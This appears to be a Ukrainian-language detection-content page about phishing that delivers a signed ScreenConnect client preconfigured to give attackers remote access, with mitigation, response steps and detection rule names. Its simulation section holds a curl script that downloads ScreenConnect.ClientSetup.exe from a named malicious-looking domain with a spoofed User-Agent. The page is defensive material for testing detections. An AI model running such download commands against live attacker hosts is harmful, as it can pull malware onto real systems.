ScreenConnect Client зловжито для несанкціонованого віддаленого доступу
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники використовують фішингові електронні листи для розповсюдження легітимного, попередньо налаштованого клієнта ScreenConnect. Інструмент для віддаленого моніторингу та управління (RMM) встановлює з’єднання зворотного виклику з екземпляром, контрольованим зловмисником, надаючи віддалений доступ до скомпрометованих систем. Кампанія зловживає довірливою природою легітимного програмного забезпечення, щоб ухилятися від основних засобів безпеки та механізмів виявлення.
Розслідування
Слідчий досліджував фішинговий електронний лист, який містив посилання для доставки файлу PE. Аналіз підтвердив, що файл був легітимним, цифрово підписаним клієнтом ScreenConnect. Однак, його вбудована конфігурація була змінена для підключення до конкретного екземпляра ретрансляції та ідентифікатора екземпляра, контрольованого загрозливим актором.
Пом’якшення
Браузери можуть блокувати завантаження виконуваних файлів як початковий шар захисту. Організації повинні контролювати несанкціоноване використання інструментів RMM та забезпечити жорсткий контроль над виконуваними файлами, завантаженими з ненадійних веб-посилань. Дозволений перелік застосунків також може допомогти запобігти виконанню несанкціонованих клієнтів ScreenConnect та іншого непідтримуваного програмного забезпечення RMM.
Реагування
Коли виявлено зловмисну діяльність, ізолюйте постраждалий кінцевий пристрій, щоб запобігти подальшому віддаленому доступу зловмисника. Визначте та заверште всі активні процеси ScreenConnect. Проведіть судово-медичний огляд конфігурації клієнта для визначення команди та управління інфраструктурою зловмисника та визначення масштабів несанкціонованого доступу до скомпрометованої системи.
Потік атаки
Ми все ще оновлюємо цю частину.
Виявлення
Альтернативне програмне забезпечення для віддаленого доступу / управління (через створення процесу)
Можлива активність командного та контрольного центру через спробу комунікації домену програмного забезпечення віддаленого доступу (через DNS)
Розповсюдження шкідливого ПЗ клієнта ScreenConnect через фішинговий імейл [HTTP-проксі]
Виконання симуляції
-
Наратив атаки та команди: Противник прагне встановити зберігання на цільовій робочій станції, розповсюджуючи ScreenConnect через фішингову кампанію. У цій симуляції ми повторюємо кінцевий етап: машина жертви, що здійснює вихідний HTTP-запит до скомпрометованого/зловмисного домену для завантаження виконуваного файлу налаштування. Щоб імітувати специфічну поведінку, ідентифіковану в розвідці загроз, “атакуючий” використовує нестандартний рядок User-Agent
ScreenConnectзапитуючи конкретний шлях до файлуthelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Це активізує правило виявлення на основі проксі. -
Скрипт регресійного тестування:
# Цей скрипт використовує curl для моделювання зловмисного запиту на завантаження, ідентифікованого в правилі виявлення. # Він використовує специфічний URL та специфічний User-Agent, необхідний для активізації сповіщення. TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe" MALICIOUS_UA="ScreenConnect" echo "[*] Симуляція спроби завантаження ScreenConnect..." echo "[*] URL: $TARGET_URL" echo "[*] User-Agent: $MALICIOUS_UA" # Ми використовуємо -k, щоб ігнорувати помилки SSL, якщо змодельований домен використовує самопідписаний сертифікат, # і -A для встановлення специфічного User-Agent. curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null echo "[*] Команда симуляції відправлена." -
Команди очистки:
# Ніякі файли насправді не були завантажені на хост під час симуляції (перенаправлено на /dev/null). # Зміни в системі не були зроблені. echo "[*] Очистка завершена. Жодних слідів на хості не залишено."